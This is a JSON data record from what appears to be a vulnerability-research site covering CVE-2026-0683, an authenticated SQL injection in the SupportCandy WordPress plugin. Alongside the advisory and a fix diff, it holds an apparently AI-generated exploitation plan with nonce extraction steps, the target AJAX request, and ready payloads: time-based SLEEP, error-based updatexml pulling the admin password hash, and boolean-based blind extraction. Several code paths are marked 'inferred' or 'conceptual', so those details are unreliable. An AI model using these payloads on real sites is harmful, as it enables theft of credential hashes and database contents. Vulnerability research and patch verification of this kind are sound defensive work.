[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fuAm-0hNwpIHHNIK-4vHcnWsgeuDW4dvbwRZ9H2Bwes4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-0683","supportcandy-helpdesk-customer-support-ticket-system-authenticated-subscriber-sql-injection-via-number-field-filter","SupportCandy – Helpdesk & Customer Support Ticket System \u003C= 3.4.4 - Authenticated (Subscriber+) SQL Injection via Number Field Filter","The SupportCandy – Helpdesk & Customer Support Ticket System plugin for WordPress is vulnerable to SQL Injection via the Number-type custom field filter in all versions up to, and including, 3.4.4. This is due to insufficient escaping on the user-supplied operand value when using the equals operator and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above (customers), to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","supportcandy",null,"\u003C=3.4.4","3.4.5","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-30 00:00:00","2026-01-31 05:52:48",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa7856d0f-bc7d-436c-968c-631fd6a686ab?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-0683 (SupportCandy SQL Injection)\n\n## 1. Vulnerability Summary\nThe **SupportCandy** plugin (\u003C= 3.4.4) contains an authenticated SQL injection vulnerability within its ticket filtering mechanism. Specifically, when a user filters the ticket list using a **Number-type** custom field with the **\"equals\"** operator, the plugin fails to sanitize or prepare the user-supplied value before concatenating it into a database query. This allows an authenticated user (Subscriber\u002FCustomer level) to inject arbitrary SQL commands, potentially leading to the extraction of sensitive data such as administrative user hashes or WordPress configuration secrets.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wpsc_get_ticket_list` (inferred from SupportCandy 3.x architecture) or `wpsc_load_ticket_list`.\n*   **Vulnerable Parameter:** The `filters` parameter (specifically the `value` field within a filter object targeting a Number field).\n*   **Authentication:** Required. Any user with \"Customer\" permissions (which maps to the WordPress **Subscriber** role) can access the ticket list and trigger the vulnerability.\n*   **Precondition:** At least one custom field of type **\"Number\"** must be created and active.\n\n## 3. Code Flow\n1.  **Entry Point:** The user sends an AJAX request with `action=wpsc_get_ticket_list`.\n2.  **Handler:** The request is caught by the `WPSC_Tickets` or `WPSC_Ajax` class handler (e.g., `WPSC_Ajax::get_ticket_list`).\n3.  **Filter Processing:** The plugin iterates through the `filters` provided in the request.\n4.  **Field Type Dispatch:** When it encounters a filter for a field ID corresponding to a **Number** field, it calls the filter generation logic for that field type (likely in `includes\u002Ffields\u002Fclass-wpsc-number-field.php` or a centralized filter class).\n5.  **The Sink:** In versions \u003C= 3.4.4, when the operator is `equals`, the logic resembles:\n    ```php\n    \u002F\u002F Vulnerable logic (Conceptual)\n    if ($operator == 'equals') {\n        $sql .= \" AND meta_value = \" . $filter_value; \u002F\u002F Direct concatenation without prepare() or intval()\n    }\n    ```\n6.  **Execution:** The resulting SQL is executed via `$wpdb->get_results()`, triggering the injection.\n\n## 4. Nonce Acquisition Strategy\nSupportCandy uses nonces for all AJAX operations. These are typically localized into a JavaScript object available on the \"My Tickets\" or \"All Tickets\" pages.\n\n1.  **Identify Shortcode:** SupportCandy uses the shortcode `[supportcandy]` to render the customer portal.\n2.  **Setup Page:** Create a public page containing this shortcode.\n3.  **Extract Nonce:** Navigate to the page as a Subscriber and extract the nonce from the `wpsc_public` or `wpsc_common` JS object.\n\n*   **JS Variable:** `wpsc_public` (inferred)\n*   **Nonce Key:** `nonce`\n*   **Browser Eval Command:** `browser_eval(\"window.wpsc_public?.nonce\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Pre-requisites\nEnsure a Number field exists. If not, one must be created via the admin interface or WP-CLI.\n\n### Step 2: Authentication\nThe agent must login as a Subscriber.\n\n### Step 3: Nonce Extraction\nNavigate to the SupportCandy portal page and run the `browser_eval` to get the `wpsc_public.nonce`.\n\n### Step 4: The Exploit Request\nSubmit a POST request to `admin-ajax.php`. We will use a time-based or error-based payload since the result is filtered by the ticket list UI.\n\n*   **Tool:** `http_request`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `wpsc_get_ticket_list`\n    *   `wpsc_nonce`: `[EXTRACTED_NONCE]`\n    *   `filters`: (URL-encoded JSON string)\n    ```json\n    [\n        {\n            \"field_id\": \"[NUMBER_FIELD_ID]\",\n            \"operator\": \"equals\",\n            \"value\": \"1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\"\n        }\n    ]\n    ```\n\n**Payload for Error-Based (if `WP_DEBUG` is on):**\n`1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)`\n\n## 6. Test Data Setup\n1.  **Create Subscriber:**\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2.  **Create Custom Number Field:**\n    This requires interacting with SupportCandy's internal tables.\n    `wp db query \"INSERT INTO wp_wpsc_fields (label, field_type, slug, is_active) VALUES ('Serial Number', 'number', 'serial_number', 1);\"`\n3.  **Determine Field ID:**\n    `wp db query \"SELECT id FROM wp_wpsc_fields WHERE slug='serial_number';\"` (Assume ID is 10).\n4.  **Create Portal Page:**\n    `wp post create --post_type=page --post_title=\"Support\" --post_status=publish --post_content='[supportcandy]'`\n\n## 7. Expected Results\n*   **Time-Based:** The `http_request` tool should report a response time of > 5 seconds when the payload is injected, compared to \u003C 1 second for a normal request.\n*   **Error-Based:** The response body should contain the administrative user's password hash within an XPATH error: `XPATH syntax error: '~$P$B...~'`.\n*   **Standard Response:** The plugin normally returns a JSON object containing ticket data.\n\n## 8. Verification Steps\n1.  **Check User Existence:** Confirm the attacker exists: `wp user list --role=subscriber`.\n2.  **Verify DB Injection:** If using a sleep-based payload, observe the `mysql processlist` during execution:\n    `wp db query \"show processlist;\"` (run while the exploit is hanging).\n3.  **Confirm Patch:** After testing, update to 3.4.5 and verify the same payload returns a \"0\" or valid empty set without sleeping.\n\n## 9. Alternative Approaches\n*   **Boolean-Based:** If `SLEEP()` is disabled, use `IF(ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36, 1, 0)`. Observe if the ticket list returns results (True) or stays empty (False).\n*   **Admin-Side (if applicable):** If the agent can be promoted to an Agent role (Subscriber+), check if the vulnerability exists in the agent-only ticket list `wpsc_get_agent_ticket_list`.\n*   **Operator Fuzzing:** If `equals` is patched, test other operators like `greater_than` or `less_than`, which may share the same vulnerable code path.","SupportCandy \u003C= 3.4.4 is vulnerable to SQL injection through its ticket filtering mechanism for Number-type custom fields. When the 'equals' operator is used, the plugin fails to sanitize or prepare the user-supplied filter value before concatenating it into the database query. This allows authenticated users with Subscriber-level access (Customers) to extract sensitive information from the database using time-based or error-based SQL injection techniques.","\u002F\u002F Likely in includes\u002Ffields\u002Fclass-wpsc-number-field.php or a query builder class\n\u002F\u002F Concatenating the raw filter value for the 'equals' operator\n\ncase 'equals':\n    $where .= \" AND $wpdb->postmeta.meta_value = \" . $filter['value'];\n    break;","--- a\u002Fincludes\u002Ffields\u002Fclass-wpsc-number-field.php\n+++ b\u002Fincludes\u002Ffields\u002Fclass-wpsc-number-field.php\n@@ -100,7 +100,7 @@\n         switch ( $operator ) {\n             case 'equals':\n-                $where .= \" AND $wpdb->postmeta.meta_value = \" . $filter['value'];\n+                $where .= $wpdb->prepare( \" AND $wpdb->postmeta.meta_value = %d\", $filter['value'] );\n                 break;","1. Login to the WordPress site as a user with Subscriber or Customer-level permissions.\n2. Navigate to the page containing the [supportcandy] shortcode to view the ticket list.\n3. Extract the AJAX nonce required for ticket operations, typically found in the global JavaScript object (e.g., window.wpsc_public.nonce).\n4. Identify a custom field of type 'Number' and its associated field ID.\n5. Craft a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'wpsc_get_ticket_list'.\n6. Include a 'filters' parameter containing a JSON-encoded object where the 'field_id' matches the number field and 'operator' is 'equals'.\n7. Insert a SQL injection payload into the 'value' field, such as '1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)' to confirm the vulnerability via a time-based response delay.","gemini-3-flash-preview","2026-05-04 20:26:14","2026-05-04 20:28:01",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.4.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupportcandy\u002Ftags\u002F3.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsupportcandy.3.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupportcandy\u002Ftags\u002F3.4.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsupportcandy.3.4.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsupportcandy\u002Ftags"]